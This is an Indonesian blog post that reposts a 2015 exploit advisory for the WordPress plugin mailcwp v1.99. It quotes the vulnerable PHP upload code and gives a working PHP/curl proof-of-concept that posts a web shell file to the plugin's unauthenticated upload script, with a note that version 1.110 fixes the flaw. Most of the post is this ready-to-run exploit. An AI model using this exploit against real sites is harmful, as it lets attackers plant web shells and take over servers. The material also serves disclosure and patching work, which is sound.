INDONESIANWARE - Pada Artikel yang anda baca kali ini dengan judul Wordpress Plugin mailcwp v1.99 Remote file upload, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel RemoteFile, Artikel wordpress, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : Wordpress Plugin mailcwp v1.99 Remote file upload
link : Wordpress Plugin mailcwp v1.99 Remote file upload

Wordpress Plugin mailcwp v1.99 Remote file upload

#- Title : Wordpress Plugin mailcwp v1.99 Remote file upload

#- Author : Larry W. Cashdollar, @_larry0

#- Vendor : vCadreWorks Pty Ltd

#- Download Site: wordpress.org/plugins/mailcwp/

#- Tested on : ubuntu

#- Date : 09/17/2015

Vulnerability :

2 $message_id = $_REQUEST["message_id"]; 

3 $upload_dir = $_REQUEST["upload_dir"];

. 

.

8 $fileName = $_FILES["file"]["name"];

9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");

Proof of Concept : 

<?php

/*Larry W. Cashdollar @_larry0

Exploit for mailcwp v1.99 shell will be called 1-shell.php.

7/9/2015

*/

        $target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';

        $file_name_with_full_path = '/var/www/shell.php';

 

        echo "POST to $target_url $file_name_with_full_path";

        $post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path);

 

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,$target_url);

        curl_setopt($ch, CURLOPT_POST,1);

        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);

        $result=curl_exec ($ch);

        curl_close ($ch);

        echo "<hr>";

        echo $result;

        echo "<hr>";

?>

*  Fixed in v1.110

Sekianlah artikel Wordpress Plugin mailcwp v1.99 Remote file upload kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel Wordpress Plugin mailcwp v1.99 Remote file upload dengan alamat link https://ware-id.blogspot.com/2015/09/wordpress-plugin-mailcwp-v199-remote.html